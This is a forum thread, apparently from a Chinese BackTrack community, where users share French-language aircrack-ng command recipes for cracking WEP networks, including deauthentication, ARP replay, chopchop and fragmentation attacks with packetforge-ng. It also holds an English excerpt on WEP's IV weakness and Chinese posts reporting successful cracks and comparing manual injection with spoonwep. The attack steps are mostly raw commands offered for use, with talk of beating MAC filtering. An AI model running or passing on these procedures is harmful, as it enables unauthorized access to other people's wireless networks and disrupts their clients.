【BT wep/wpa crack】

ziggler

aircrack documentation 见附件好东西。

ziggler

Wep avec client
Capture : airodump-ng –write (filecap) –channel (x) –bssid @AP wlan0
Test asso : aireplay-ng -1 0 –e ESSID –a @AP –h @station wlan0
Injection : aireplay-ng -3 –e ESSID –b @AP –h @station wlan0
Si pas d’ivs lancer déauth
Déauth : aireplay-ng -0 30 –a @AP –c @station wlan 0
PS: egalement utile de déauth l’AP meme commande sans –c
Crack : aircrack-ng *.cap

ziggler

Wep sans client
Methode Chopchop (connaître @mac d’une station obligatoire)
Capture : airodump-ng –write (filecap) –channel (x) –bssid @AP wlan0
Attack : aireplay-ng –chopchop –F –b @AP –h @station wlan0
Forge du packet : packetforge-ng -0 –a @AP –h @station –k 10.255.255.255 –l 192.168.x.x
-y replay.xor -w arprequest
Crack : aircrack-ng -P2 *.cap
-----------------------------------------------------------------------------------------------------------------
Methode Fragmentation (connaître @mac d’une station obligatoire)
Capture : airodump-ng --write (filecap) --channel (x) --bssid @AP wlan0
Authentification : aireplay-ng -1 6000 -o 1 -q 10 -e (ESSID) -a @AP -h
@MAC(votre_carte_wifi) wlan0 (laissez tourner constamment)
Attack : aireplay-ng -5 -a @AP -h @MAC(votre_carte_wifi wlan0
(noter le fichier fragment-0xxxx .xor)
Packetforge: packetforge-ng -0 -a @AP -h @MAC(votre_carte_wifi) -k (ip source) -l (ip
destination) -y (fragment-0xxxx.xor) -w (nom_fichier_sauvegarde) wrote packet to:
(nom_fichier_sauvegarde)
Injection : aireplay-ng -2 -r (nom_fichier_ sauvegarde) wlan0 >(acceptez en tapant: y)
Crack: aircrack-ng -z -0 *.cap
-----------------------------------------------------------------------------------------------------------------
Methode -p 0841
Capture : airodump-ng –write (filecap) –channel (x) –bssid @AP wlan0
Attack: aireplay-ng -1 0 -a @AP -h @MAC(votre_carte_wifi) wlan0 (acceptez le paquet à
réinjecter avec y (yes) )
Crack : aircrack-ng -K k-01.cap

ziggler

WEP Crackin
[edit]
Theory
A little theory first. WEP is a really crappy and old encryption techinque to secure a wireless connection. A 3-byte vector, called an Initalization Vector or IV, is prepended onto packets and its based on a pre-shared key that all the authenticated clients know... think of it as the network key you need to authenticate. Well if its on (almost) every packet generated by the client or AP, then if we collect enough of them, like a few hundred thousand, we should be able to dramatically reduce the keyspace to check and brute force becomes a realistic proposition. A couple of things will cause us some problems.
• If the key is not static, then you'll mix up all your IVs and it'll take forever to decrypt the key.
• Theres no traffic, therefore no packets - we can fix this.
• MAC Address Filtering - we can fix this too.

ziggler

Cracking WEP and WPA Wireless Networks

ziggler

有客户端用ARP注入，效果不错。1W多data的时候就破解了。

带脚镣跳舞

BT3 不错 破解WEP 相当快 支持注射

WAP嘛 就比较难了  wordlist里的字典不行

ziggler

主要还的是要有DATA,没有足够的DATA就比较难了。

WPA难度大很多。

ziggler

同一个AP手工碎片注入成功。
而用spoonwep2选择碎片注入则没有成功。

不知道是啥原因？难道是两种方式用的参数不同所致。

目前使用spoonwep ARP注入，交互注入成功破解过AP，但是断续注入，碎片注入没有成功过。感觉spoonwep对data的依赖性很强。

用手工碎片注入目前100%成功。这个尤其是在没有客户端，没有data的情况下特别好使。

综合来看以后还是要用手工碎片注入为主。

spoonwep为何表现这样，还需要查明原因？

[ 本帖最后由 ziggler 于 2009-8-16 23:33 编辑 ]

ziggler

手工碎片注入：
这一步有的AP就过不去，而且这一步是关键，这一步不OK，下来就搞不了了。
Attack : aireplay-ng -5 -a @AP -h @MAC(votre_carte_wifi wlan0
(noter le fichier fragment-0xxxx .xor)